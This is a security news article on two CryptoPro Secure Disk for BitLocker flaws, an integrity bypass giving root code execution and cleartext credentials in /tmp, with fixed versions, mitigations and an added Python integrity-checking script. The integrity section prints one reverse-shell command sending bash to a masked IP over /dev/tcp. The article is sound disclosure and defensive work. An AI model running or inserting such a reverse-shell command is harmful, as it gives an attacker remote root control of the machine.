CPSD CryptoPro Secure Disk for BitLocker Vulnerabilities

Numerous flaws have been found in the popular encryption program CryptoPro Secure Disk (CPSD) for BitLocker. An attacker with physical access to a device could use these vulnerabilities to obtain persistent root access and steal sensitive credentials.
The problems, found by security researchers at SEC Consult Vulnerability Lab, highlight important risks for businesses that depend on this software to protect their data.

| CVE | CVSS | Details |
|---|---|---|
| CVE-2025-10010 | N/A | Root code execution is made possible by integrity bypass. |
| N/A | N/A | Credentials are exposed by cleartext /tmp data. |

Bypassing Integrity Validation

The integrity validation bypass is the first vulnerability, identified as CVE-2025-10010.
After authenticating users with a minimal Linux operating system, CryptoPro Secure Disk uses BitLocker to decrypt the Windows partition. Anyone who can physically access the hard drive or boot the system from an external medium can access this Linux system, which is located on an unencrypted partition. Although the system verifies files using the Integrity Measurement Architecture (IMA) of the Linux kernel, researchers discovered that IMA does not validate some configuration files.
bash -c "exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 \&1' &

An attacker can run arbitrary code with root privileges by altering these files. This might make it possible for them to install a backdoor and watch or retrieve data while it's running without causing any system errors.
| Product | Vulnerable Versions | Fixed Versions |
|---|---|---|
| CPSD CryptoPro Secure Disk | < 7.6.6 / < 7.7.1 | 7.6.6 / 7.7.1 |

Sensitive Data Storage in Cleartext

Sensitive information stored in plain text is the second problem. CryptoPro Secure Disk provides an online support feature that connects to a predetermined network in case users forget their login credentials. The system stores required secrets, including passwords and certificates, in cleartext inside the temporary "/tmp" folder in order to enable this connection, according to SEC Consult.
An attacker can easily read these files if they have already obtained access to the Linux environment, possibly as a result of the first vulnerability.
Cleartext certificate credentials allow 802.1X bypass and reveal WLAN access (source: SEC Consult).

The infrastructure of the company could then be further jeopardized if this information is used to gain access to internal networks or get around network access controls. After being informed of these problems in June 2025, the vendor, CPSD, has since released patches.
The vulnerabilities are fixed in versions 7.6.6 and 7.7.1. Businesses that use CryptoPro Secure Disk should update their software right away. The vendor suggests encrypting the PBA partition, a feature that has been available since version 7.6.0, if updating cannot be done right away. This encryption is enabled by default as of version 7.7, reducing the possibility of unwanted file changes.
In order to find and fix any additional potential flaws, SEC Consult also suggests that businesses perform comprehensive security assessments of their encryption systems.
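
Until a host is updated or its PBA partition is encrypted, changes to the unencrypted Linux partition can be detected from a trusted environment by comparing it with a known-good manifest, which covers every file regardless of what IMA validates. The Python script below is an added example, not code from CPSD or SEC Consult; the mount point, manifest file and function names are assumptions.

```python
import hashlib
import json
import os
import stat
import sys
from pathlib import Path

def fingerprint(path):
    """Describe one entry by type, permission bits and content."""
    st = os.lstat(path)  # lstat: never follow symlinks off the partition
    mode = stat.S_IMODE(st.st_mode)
    if stat.S_ISLNK(st.st_mode):
        return f"link:{os.readlink(path)}"
    if not stat.S_ISREG(st.st_mode):  # directories, devices, sockets
        return f"other:{stat.S_IFMT(st.st_mode):o}:{mode:o}"
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return f"file:{mode:o}:{digest.hexdigest()}"

def snapshot(root):
    """Map every path below root (relative to root) to its fingerprint."""
    entries = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            entries[os.path.relpath(full, root)] = fingerprint(full)
    return entries

def compare(baseline, current):
    """Return sorted lists of added, removed and modified paths."""
    added = sorted(current.keys() - baseline.keys())
    removed = sorted(baseline.keys() - current.keys())
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return added, removed, modified

if __name__ == "__main__":
    # Assumed usage: check.py <mounted-partition> <baseline.json>
    root, manifest = sys.argv[1], Path(sys.argv[2])
    if not manifest.exists():  # first run records the known-good baseline
        manifest.write_text(json.dumps(snapshot(root), indent=1))
        sys.exit(0)
    report = compare(json.loads(manifest.read_text()), snapshot(root))
    for label, paths in zip(("ADDED", "REMOVED", "MODIFIED"), report):
        for path in paths:
            print(label, path)
    sys.exit(1 if any(report) else 0)
```

Keep the manifest off the partition being checked, and record a new baseline after each vendor update.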